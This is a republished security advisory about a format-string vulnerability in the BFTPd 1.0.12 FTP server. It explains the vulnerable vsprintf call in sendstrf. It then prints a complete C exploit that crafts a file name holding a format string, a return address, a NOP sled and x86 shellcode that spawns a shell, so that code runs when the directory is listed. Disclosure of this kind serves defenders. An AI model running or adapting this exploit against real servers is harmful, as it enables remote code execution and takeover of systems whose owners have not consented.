[ SOURCE: http://www.secureroot.com/security/advisories/9761914935.html ] Malformed vsprintf in BFTPd allows execution of arbitrary code ------------------------------------------------------------------------ SUMMARY BFTPd is a Linux FTP server with chroot and setreuid functionality. The latest version of BFTP has a potential security problem when the NSLT command is requested to list a file that contains a formatting string. The vulnerability allows remote attackers to overflow internal buffers, and execute arbitrary code. DETAILS Vulnerable systems: BFTPd 1.0.12 There is a malformed call to vsprintf in BFTPd. The relevant vulnerable function is sendstrf: int sendstrf(int s, char *format, ...) { .... vsprintf(buffer, format, val); When the function is called from an NLIST command, it is incorrectly allowed to supply formatting string to the vsprintf: else foo = 1; sendstrf(s, entry->d_name); } This can be used to overflow the buffer of the vsprintf and execute arbitrary code. Exploit: /* Creates a filname to exploit the bug in bftpd 1.0.12 Create the file, cwd in the shell directory and nlist the file directory (sh is executed in the working dir because it is not possible to insert a / in the filename) hints by |CyRaX| & Cthulhu coded by asynchro www.pkcrew.org */ #include #include #define BUFSIZE 512 #define NOP 124 main() { int i; char *buff; char nop=0x90; char addr[]="\xd4\xf9\xff\xbf"; char command[]="touch %.260x"; char shellcode[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xffsh"; buff=(char *) malloc(BUFSIZE); memset(buff,0x0,BUFSIZE); memcpy(buff,command,sizeof(command)); strncat(buff,addr,4); strncat(buff,addr,4); for(i=0; i < NOP ;i++) { strncat(buff,&nop,1); } strncat(buff,shellcode,strlen(shellcode)); system(buff); } ADDITIONAL INFORMATION The information has been provided by asynchro.